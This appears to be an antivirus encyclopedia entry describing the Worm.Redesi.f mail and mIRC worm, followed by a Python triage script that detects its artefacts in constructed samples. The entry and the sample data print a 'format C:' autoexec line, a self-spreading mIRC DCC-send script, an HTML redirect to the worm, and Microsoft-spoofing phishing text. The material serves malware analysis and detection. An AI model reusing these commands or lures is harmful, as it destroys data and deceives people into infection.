Term | Worm.Redesi.f |
Definition |

Basic information
Virus aliases: I-Worm.Redesi.f [AVP], I-Worm/Redesi.f [KV], Worm.Redesi.f [RS]
Processing time:
Threat level: ★★
Chinese name: 红丝带变种F (Red Ribbon variant F)
Virus type: Worm
Affected systems: Win9x / WinNT

Virus behaviour
This worm spreads by e-mail and through mIRC. When it runs it pops up a message box claiming that a Windows update succeeded, to mislead the user, copies five copies of itself to the root of drive C:, and adds a Run entry to the registry so that it starts with the system. It also writes two batch commands to C:\autoexec.bat: one displays "With a fool no season spend, or be counted as his freind." and the other formats drive C:. By modifying mIRC's script configuration file it links mIRC to the worm file, adding a second propagation path. It also creates an HTML file, C:\inetpub\wwwroot\default.htm, which launches the worm file when the page is opened. The worm harvests e-mail addresses from the Outlook Express address book and mails itself as an attachment in Microsoft's name; the message is highly deceptive, so users are likely to open the attachment and become infected.

1) Creates several copies of the worm in the root of drive C: (all hidden files):
   C:\Commond.exe
   C:\MAPI.exe
   C:\Sysupdate.exe
   C:\UserConfig.exe
   C:\disksync.exe

2) Adds a Run entry to the registry so that the worm starts with the system:
   HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
   "Desire"="C:\commond.exe"
   Under HKEY_LOCAL_MACHINE\Software\Microsoft it adds the value:
   "Desire"="Done"

3) Writes the following to C:\autoexec.bat:
   ECHO With a fool no season spend, or be counted as his freind.
   format C: /autotest

4) Writes the following to C:\mirc\script.ini:
   [script]
   n0= on 1:JOIN:#:{
   n1= .msg $nick Dear User. Please apply this patch that will protect you from UDP flooding. If you are running a Linux IRC client this update is not needed due to kernel filtering. Regards. Dalnet / Undernet staff.
   n2= .copy C:\MAPI.exe C:\mirc\IRCUpdate.IRC.pif
   n3= .dcc send $nick C:\mirc\IRCUpdate.IRC.pif
   n4= }

5) Creates the file:
   C:\inetpub\wwwroot\Web.exe
   and a web page pointing at it:
   C:\inetpub\wwwroot\default.htm
   with the following content:
   <META http-equiv="refresh" content="0; url=Web.exe">
   <A href="./Web.exe"><h3>We Are Forever</h3></A>

6) Uses one of the following lines as the e-mail subject:
   FW: Windows at Risk.
   FW: Buffer overflow could cause IT meltdown.
   FW: Insufficient bounds chcecking cause buffer over run.
   FW: Executable stack could cost IT sector millions.
   FW: Invalid instruction causes AX and BX registers to differ.
   FW: Terrorists release computer virus.
   FW: Microsoft and C.E.R.T Corobaration
   FW: Stack overrun can cause data loss on first bootable disk
   FW: Microsoft Update. Final Release Candidate.
   FW: Redesi worm. MAPI update..

7) E-mail body:
   Hey.
   Sorry I've not emailed you for a while ... well I am now. Just letting you know I'll be sending an attachment in my next email, so you don't have to worry. I know you can't be too carefull with these virii around, but this is OK. Speak to you later.

   Hey
   Well, here is the email I told you I was going to send. I'll speak to you more later. The boss is comming.
   -----Original Message-----
   From: Microsoft Security List [mailto:security@microsoft.com]
   Sent: 25 October 2001 12:03
   Subject: Buffer overflow
   Dear Subscriber
   Due to insufficient bounds checking in the Windows Messaging API any value stores in the AX and BX registers(and their register halves any XOR (compare) operation against these to registers or the h and l register halfs will always return and value of 1, causing the JNE instruction to execute. We consider this a HIGH RISK vulnerability,and any computer hacker having any knowledge of the assembly language could write a working egg to exploit this flaw. It is highly advised that you install the attached MAPI update to stop any subsequent security breach.
   Regards
   Microsoft Support

8) Uses one of the following names for the attachment:
   Commond.exe
   MAPI.exe
   Sysupdate.exe
   UserConfig.exe
   disksync.exe
|
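A triage script for the indicators this entry lists, written as an added example (it is not code from the entry or from any vendor). It checks constructed copies of the five host artefacts from items 1-5 (dropped files, Run value, autoexec.bat, mIRC script.ini, default.htm) and classifies a constructed message against the lure described in items 6-8. The script.ini parser, the `format` and DCC-send patterns, the sample artefacts and the sample message are all this example's own constructions; only the file names, the registry value name and the subject lines are taken from the entry. The DCC-send check generalises beyond the entry's `.pif` to any executable extension.

```python
"""Triage helpers for the Redesi.f indicators listed in the entry above (added example,
not code from the entry). Every input is a constructed in-memory string or list, so it
runs offline; on a real host the checks would read a directory listing, a registry
export, the two text files and the mail spool instead."""
import re
from email import message_from_string, policy
from email.message import EmailMessage
from typing import Dict, Iterable, List, Tuple

# Indicators copied from the entry (Windows file names compare case-insensitively).
DROPPED_FILES = {"commond.exe", "mapi.exe", "sysupdate.exe", "userconfig.exe", "disksync.exe"}
RUN_VALUE_NAME = "desire"
MAIL_SUBJECTS = {"FW: Windows at Risk.", "FW: Buffer overflow could cause IT meltdown.",
                 "FW: Redesi worm. MAPI update.."}
EXE_EXT = re.compile(r"\.(exe|pif|scr|com|bat)$", re.I)
# mIRC command that pushes an executable to whoever just joined (generalised beyond .pif).
DCC_SEND_EXE = re.compile(r"\.dcc\s+send\s+\$nick\s+\S+\.(pif|exe|scr|com|bat)\b", re.I)


def parse_mirc_script(ini_text: str) -> List[str]:
    """Return the n0=, n1=, ... lines of the [script] section of script.ini, in order."""
    numbered, in_script = [], False
    for raw in ini_text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            in_script = line.lower() == "[script]"
            continue
        m = re.match(r"n(\d+)=(.*)", line)
        if in_script and m:
            numbered.append((int(m.group(1)), m.group(2).strip()))
    return [body for _, body in sorted(numbered)]


def scan_host(root_files: Iterable[str], run_values: Dict[str, str],
              autoexec: str, mirc_ini: str, default_htm: str) -> List[str]:
    """Check the five host artefact classes from the entry; return one tag per hit."""
    findings = []
    for name in root_files:                       # 1) hidden copies in the C:\ root
        if name.lower() in DROPPED_FILES:
            findings.append(f"dropped_file:{name.lower()}")
    for value, data in run_values.items():        # 2) HKLM\...\CurrentVersion\Run values
        if value.lower() == RUN_VALUE_NAME or data.lower().rsplit("\\", 1)[-1] in DROPPED_FILES:
            findings.append(f"run_key:{value}")
    for line in autoexec.splitlines():            # 3) destructive command in autoexec.bat
        if re.match(r"\s*format\s+[a-z]:", line, re.I):
            findings.append("autoexec_format")
    script = " ".join(parse_mirc_script(mirc_ini))  # 4) JOIN handler that DCC-sends a file
    if re.search(r"on\s+\S+:JOIN:", script, re.I) and DCC_SEND_EXE.search(script):
        findings.append("mirc_join_dcc_send")
    if re.search(r'http-equiv=["\']refresh["\'][^>]*url=\S*\.exe', default_htm, re.I):
        findings.append("html_refresh_to_exe")   # 5) default.htm redirecting to Web.exe
    return findings


def classify_mail(raw: str) -> List[str]:
    """Flag the lure from items 6-8: a Microsoft-branded message with an executable attached."""
    msg = message_from_string(raw, policy=policy.default)
    tags = []
    if str(msg["Subject"] or "") in MAIL_SUBJECTS:
        tags.append("known_subject")
    sender = str(msg["From"] or "").lower()
    for part in msg.iter_attachments():
        fname = part.get_filename() or ""
        if EXE_EXT.search(fname):
            tags.append("exe_attachment")
            if "microsoft.com" in sender:     # vendor name on an executable attachment
                tags.append("vendor_spoof_with_exe")
            if fname.lower() in DROPPED_FILES:
                tags.append(f"known_attachment:{fname.lower()}")
    return tags


def sample_host_artifacts() -> Tuple[List[str], Dict[str, str], str, str, str]:
    """Constructed artefacts mirroring items 1-5 of the entry (not a real host image)."""
    root_files = ["autoexec.bat", "Commond.exe", "MAPI.exe", "Sysupdate.exe",
                  "UserConfig.exe", "disksync.exe"]
    run_values = {"Desire": "C:\\commond.exe", "SystemTray": "SysTray.Exe"}
    autoexec = "ECHO With a fool no season spend, or be counted as his freind.\nformat C: /autotest\n"
    mirc_ini = ("[script]\nn0= on 1:JOIN:#:{\nn1= .msg $nick Dear User. Please apply this patch.\n"
                "n2= .copy C:\\MAPI.exe C:\\mirc\\IRCUpdate.IRC.pif\n"
                "n3= .dcc send $nick C:\\mirc\\IRCUpdate.IRC.pif\nn4= }\n")
    default_htm = ('<META http-equiv="refresh" content="0; url=Web.exe">\n'
                   '<A href="./Web.exe"><h3>We Are Forever</h3></A>\n')
    return root_files, run_values, autoexec, mirc_ini, default_htm


def build_sample_mail() -> str:
    """Constructed message (not a captured sample): one of the subjects plus an .exe attachment."""
    msg = EmailMessage()
    msg["From"] = "Microsoft Security List <security@microsoft.com>"
    msg["To"] = "subscriber@example.invalid"
    msg["Subject"] = "FW: Redesi worm. MAPI update.."
    msg.set_content("Dear Subscriber, install the attached MAPI update.")
    msg.add_attachment(b"MZ\x90\x00" + b"\x00" * 16, maintype="application",
                       subtype="octet-stream", filename="MAPI.exe")
    return msg.as_string()


if __name__ == "__main__":
    print("host:", scan_host(*sample_host_artifacts()))
    print("mail:", classify_mail(build_sample_mail()))
```

The host checks are deliberately behavioural rather than hash-based: a JOIN handler that DCC-sends an executable, a `format` line in autoexec.bat and a meta-refresh to an .exe would also flag variants that rename the dropped files, while the exact names from the entry still give a high-confidence match on this variant.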